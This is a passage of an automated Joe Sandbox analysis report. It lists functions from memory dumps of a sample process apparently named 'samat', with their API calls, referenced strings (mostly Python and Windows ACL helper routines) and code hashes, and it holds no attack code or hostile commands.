API ID: Err_LongTime$Arg_BuildDecodeErrorFileFormatFreeLastLocalLong_MessageObjectOccurredParseSystemTupleUnicode_Value
String ID: FileTimeToSystemTime
API String ID: 1618908028-1754531670
Opcode ID: 99e37812b2323da1d358adf734d79309d4d6e63afb47562442355d7a361db807
Instruction ID: f771f1ce3abe2fcfe2fc949608e91523e654cb9e610931bd5d17fae38df4b1ed
Opcode Fuzzy Hash: 99e37812b2323da1d358adf734d79309d4d6e63afb47562442355d7a361db807
Instruction Fuzzy Hash: 41113062A18B4296FB90EB29E45106E73A1FFC5FC8FC41032E74E86676EE3CD5058B00

Function 00007FF7E12CFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7E12CFD98
RaiseException.KERNEL32 ref: 00007FF7E12CFDD9

Strings

csm, xrefs: 00007FF7E12CFDC6

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 1863c94761d3cd37f162583b0d1044e7a7f6754c115aebc7d930312b3f650e75
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: D2115E32608B8182EB219F15E840399B7E8FB88B84F584232DB8D07754DF7CC551C700

Function 00007FF8B7E83360 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E833A0

Strings

AddAccessDeniedObjectAce, xrefs: 00007FF8B7E833B7
lllOOO:AddAccessDeniedObjectAce, xrefs: 00007FF8B7E83386

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: AddAccessDeniedObjectAce$lllOOO:AddAccessDeniedObjectAce
API String ID: 3371842430-3179976129
Opcode ID: e3dfeb46af7c84d4519f2e145db967f80bf3f2d84102a64a761ca55c8579d974
Instruction ID: a3d5a6c7775e39bd7cab7f618c1e7b0259a2ff724fab779546ea92e75c6170da
Opcode Fuzzy Hash: e3dfeb46af7c84d4519f2e145db967f80bf3f2d84102a64a761ca55c8579d974
Instruction Fuzzy Hash: 28111676A08B4582DB10CF55E4445AD73A4FB88BD4F510136EAAD83B24EB3DDA98CB00

Function 00007FF8B7E832B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E832F0

Strings

lllOOO:AddAccessAllowedObjectAce, xrefs: 00007FF8B7E832D6
AddAccessAllowedObjectAce, xrefs: 00007FF8B7E83307

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: AddAccessAllowedObjectAce$lllOOO:AddAccessAllowedObjectAce
API String ID: 3371842430-684429688
Opcode ID: d8f714f13fb6f6a21b8a46a53381e791b01951d00187e0f0dc706bbcebc28b78
Instruction ID: 6488975d714bc58351363c187621eb112e284fb516a214bf5231c043db1f5f59
Opcode Fuzzy Hash: d8f714f13fb6f6a21b8a46a53381e791b01951d00187e0f0dc706bbcebc28b78
Instruction Fuzzy Hash: EA111676708B8582DB10CB55E4845AD73A4FB88BD4F510136EAAD83B24EF3DD998CB00

Function 00007FF7E12E073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E076C
GetDriveTypeW.KERNEL32 ref: 00007FF7E12E07AC

Strings

:, xrefs: 00007FF7E12E0795

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: bb244cd4ccd4689cf73846cbc48848b3004b054a83a1bceda0c2ca526cca3462
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 0701D422B1C20386F725BF60982337EA3A4EF48344FC44037D94D86681DEBCE5018B2A

Function 00007FF8B7E8D4F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

PySequence_Tuple.PYTHON313(?,?,?,00007FF8B7E8CDCB), ref: 00007FF8B7E8D4F9
_Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E8CDCB), ref: 00007FF8B7E8D52B

Strings

Sequence can contain at most %d items, xrefs: 00007FF8B7E8D538

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DeallocSequence_Tuple
String ID: Sequence can contain at most %d items
API String ID: 1991852567-3507602910
Opcode ID: ba9606983f3295d13d172f3df34be46ad0d38ebee954a0bfa1b3dec53b8fac5d
Instruction ID: f58d452fc84f9dfe908248262ca9eb06cc0bb07b9e5282869651d9a617e23cc9
Opcode Fuzzy Hash: ba9606983f3295d13d172f3df34be46ad0d38ebee954a0bfa1b3dec53b8fac5d
Instruction Fuzzy Hash: A7F019A3E19B42C2EB198F5AA54053C63A1EF99FD4F481132DB1D077B6DE3CD4918710

Function 00007FF8B7E82FA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E82FD4

Strings

kkkO:AddMandatoryAce, xrefs: 00007FF8B7E82FCA
AddMandatoryAce, xrefs: 00007FF8B7E82FEB

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: AddMandatoryAce$kkkO:AddMandatoryAce
API String ID: 3371842430-3675006617
Opcode ID: 4b493b86a8402f20ddd570d78824f01e47810dec285230cae9a0e7602c506f2d
Instruction ID: 1c1894b6f13207aad8ad32f110c425a4e63c99acdc9ba29bcf7d6bdb363d36d7
Opcode Fuzzy Hash: 4b493b86a8402f20ddd570d78824f01e47810dec285230cae9a0e7602c506f2d
Instruction Fuzzy Hash: EA01DA76A0874597EB10CB69F4404AA77A4FB88BD4F540226EB9C93B29DF3CD295CF00

Function 00007FF8B7E82F10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E82F44

Strings

AddAccessDeniedAceEx, xrefs: 00007FF8B7E82F5B
lllO:AddAccessDeniedAceEx, xrefs: 00007FF8B7E82F3A

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: AddAccessDeniedAceEx$lllO:AddAccessDeniedAceEx
API String ID: 3371842430-4150984663
Opcode ID: de81793985394db8eda63548ea9406e6c785a4610c77cab919a9f42de7ceaeda
Instruction ID: 8488f432ca62670dcd5df9d21554257e982ba80964aafb268a499dd878b83b0e
Opcode Fuzzy Hash: de81793985394db8eda63548ea9406e6c785a4610c77cab919a9f42de7ceaeda
Instruction Fuzzy Hash: BD01DE76A1874596EB10CB69F4404AA77A4FB88BD4F540226EB9C43B25DF3CD255CF00

Function 00007FF8B7E866F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E866FE
_Py_NewReference.PYTHON313 ref: 00007FF8B7E86743

Strings

:OVERLAPPED, xrefs: 00007FF8B7E866F7

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseReferenceTuple
String ID: :OVERLAPPED
API String ID: 709158290-1552635527
Opcode ID: 99eac4c21a0de1c82c8a4d1f398764541f69fd89d1bf1e656bce4408f3be1879
Instruction ID: bd5b0b4437fdff76880473b47c8f2744cdd6ddc80756c2847508abbf5a24a32d
Opcode Fuzzy Hash: 99eac4c21a0de1c82c8a4d1f398764541f69fd89d1bf1e656bce4408f3be1879
Instruction Fuzzy Hash: BC011A22A18B8182E7148F25E98016D73E8FF99B88F955239DB8D43725EF3CD5A0C740

Function 00007FF8B7E82E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E82EB4

Strings

AddAccessAllowedAceEx, xrefs: 00007FF8B7E82ECB
lllO:AddAccessAllowedAceEx, xrefs: 00007FF8B7E82EAA

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: AddAccessAllowedAceEx$lllO:AddAccessAllowedAceEx
API String ID: 3371842430-1263352432
Opcode ID: 8ed8396cbea493bc20a4220841801d33528b5f207fb43b7afe4ccf89f4662698
Instruction ID: 7e7feeda1bb333818d36831583fa27145ed3723e308cb756d03f0d994616d240
Opcode Fuzzy Hash: 8ed8396cbea493bc20a4220841801d33528b5f207fb43b7afe4ccf89f4662698
Instruction Fuzzy Hash: 15011A76A08741D2EB10CB68F4400AA77A4FB88BD4F540222EB8C83B28DF3CD294CF00

Function 00007FF8B7E8D040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B7E8B1A0: PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8B1DA
Part of subcall function 00007FF8B7E8B1A0: PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B1F9

PyErr_Clear.PYTHON313 ref: 00007FF8B7E8D05C

Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B

PyErr_SetString.PYTHON313 ref: 00007FF8B7E8D092

Strings

Resource id/name must be unicode or int in the range 0-65536, xrefs: 00007FF8B7E8D081

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Long$OccurredString$ClearLong_$CharDeallocFormatNumber_Unicode_UnsignedWide
String ID: Resource id/name must be unicode or int in the range 0-65536
API String ID: 293670993-4091729669
Opcode ID: 555b23e77155b6422bb856a96e125e404c24bcfd3c1006e6b91ad9e20b969513
Instruction ID: bd4327f135e3b1e1a1d42780dc140e9336a990c4a76a722c32cf5c2e2d9e8195
Opcode Fuzzy Hash: 555b23e77155b6422bb856a96e125e404c24bcfd3c1006e6b91ad9e20b969513
Instruction Fuzzy Hash: ADF04F62B1874281FB509B6AF94437D12A2AF4CFC8F845031EB5D866AAEE3CD4818300

Function 00007FF8B7E8CFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B7E8AD90: PyErr_SetString.PYTHON313 ref: 00007FF8B7E8ADCF

PyErr_Clear.PYTHON313 ref: 00007FF8B7E8CFBC

Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B

PyErr_SetString.PYTHON313 ref: 00007FF8B7E8CFF2

Strings

Resource id/name must be string or int in the range 0-65536, xrefs: 00007FF8B7E8CFE1

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Long$Occurred$ClearLong_String$DeallocFormatNumber_Unsigned
String ID: Resource id/name must be string or int in the range 0-65536
API String ID: 286819204-907244015
Opcode ID: 31b1ca96400902001310dfbad8b15d17db623f0623437432e6c4c09ff0a382c6
Instruction ID: 4ba3de3c5ec4d82b907444a4f1169451370f2e38b0adc8e3bec94d850b07a305
Opcode Fuzzy Hash: 31b1ca96400902001310dfbad8b15d17db623f0623437432e6c4c09ff0a382c6
Instruction Fuzzy Hash: A3F04F22B1874291FB519B6AF94437D1291EF48FC8F854031EB5D866A6EE3CD4818300

Function 00007FF8B7E8A820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

PyCapsule_Import.PYTHON313 ref: 00007FF8B7E8A82D
PyType_Ready.PYTHON313 ref: 00007FF8B7E8A881

Strings

datetime.datetime_CAPI, xrefs: 00007FF8B7E8A826

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Capsule_ImportReadyType_
String ID: datetime.datetime_CAPI
API String ID: 2581296196-711417590
Opcode ID: 71f6e2cd8b549125eda3018e95e8dee2b3e503f95c455a05ccb1b3c9eda9d859
Instruction ID: 7ca7eed74ef571aac8612cc8102ae7c3e2e3f32726053a993f138cbc6c52a77e
Opcode Fuzzy Hash: 71f6e2cd8b549125eda3018e95e8dee2b3e503f95c455a05ccb1b3c9eda9d859
Instruction Fuzzy Hash: 1701A879A09B4681EA05CB59E89006933B4FF98FD0F998631EA5D83370DF3CD496C210

Function 00007FF8B7E85340 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E85356
PyLong_FromLongLong.PYTHON313 ref: 00007FF8B7E85380

Strings

:Detach, xrefs: 00007FF8B7E8534F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Long$Arg_FromLong_ParseTuple
String ID: :Detach
API String ID: 1152936543-4103459575
Opcode ID: f8836bdbb5d1f36a60bbf496dee83d82e6e9fc9586328ff7cf63e7ebb02f3342
Instruction ID: 6f8723c0d68ed750c791c9296e693954ebcf3485ffaf7f7b1f0579751084525b
Opcode Fuzzy Hash: f8836bdbb5d1f36a60bbf496dee83d82e6e9fc9586328ff7cf63e7ebb02f3342
Instruction Fuzzy Hash: 6DF01C22B18B4182FF954B69FA8036D62E1BF48FC0F885435EA1D87768FE7CD5948300

Function 00007FF8B7E8BA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8BA4E
_Py_NewReference.PYTHON313 ref: 00007FF8B7E8BA84

Strings

:WAVEFORMATEX, xrefs: 00007FF8B7E8BA47

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseReferenceTuple
String ID: :WAVEFORMATEX
API String ID: 709158290-1364142124
Opcode ID: 669a32538ec6f923bfe1ee86a65c60c36bc7eb7b96e35d950023d8bde529439e
Instruction ID: 4d97a64daef4eea1b6597d3d8526af44ea81809169fb2115b593c9eb58818f18
Opcode Fuzzy Hash: 669a32538ec6f923bfe1ee86a65c60c36bc7eb7b96e35d950023d8bde529439e
Instruction Fuzzy Hash: 5BF03A26E15B4282EB149F69E84016D22A4BF8DF84FC55635D74D86325EF3CD1948300

Function 00007FF8B7E89A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON313 ref: 00007FF8B7E89A7D
PyObject_HasAttrString.PYTHON313 ref: 00007FF8B7E89A91

Strings

timetuple, xrefs: 00007FF8B7E89A87

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: AttrObject_StringSubtypeType_
String ID: timetuple
API String ID: 1421930220-3328721318
Opcode ID: 3f8d4b43d52be91b307c0cdd37ca4129189ec392190273ab2ef4856b4f036eae
Instruction ID: 33940bdc16e411ce48383681e5b4cebc50eea157b9165a85ccf7f1e60794ffd6
Opcode Fuzzy Hash: 3f8d4b43d52be91b307c0cdd37ca4129189ec392190273ab2ef4856b4f036eae
Instruction Fuzzy Hash: E0E0E5A2F4970692FF148BAAE88013913A09F58FE1F886070DA4D4A371EF6DD9D18200

Function 00007FF8B7E81A70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E81A98

Strings

|ii:ACL, xrefs: 00007FF8B7E81A7F
@, xrefs: 00007FF8B7E81A77

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: @$|ii:ACL
API String ID: 3371842430-2672190651
Opcode ID: a334b7dfaa821d41b7e8f3be6c7a66ccbd714a8d02a99bdf497d0802bf0223a7
Instruction ID: c03d4c84526696c8f6e2877ecc974910d1ccec2b3ec8db218bda9cc6afcc8812
Opcode Fuzzy Hash: a334b7dfaa821d41b7e8f3be6c7a66ccbd714a8d02a99bdf497d0802bf0223a7
Instruction Fuzzy Hash: 66F01265A0878186E600DB94E40125DA7A4FF84BD4FC04034EB4D57775EFBCD119CB40

Function 00007FF8B7E81BA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E81BB6
IsValidAcl.ADVAPI32 ref: 00007FF8B7E81BCC

Strings

:IsValid, xrefs: 00007FF8B7E81BAF

Memory Dump Source

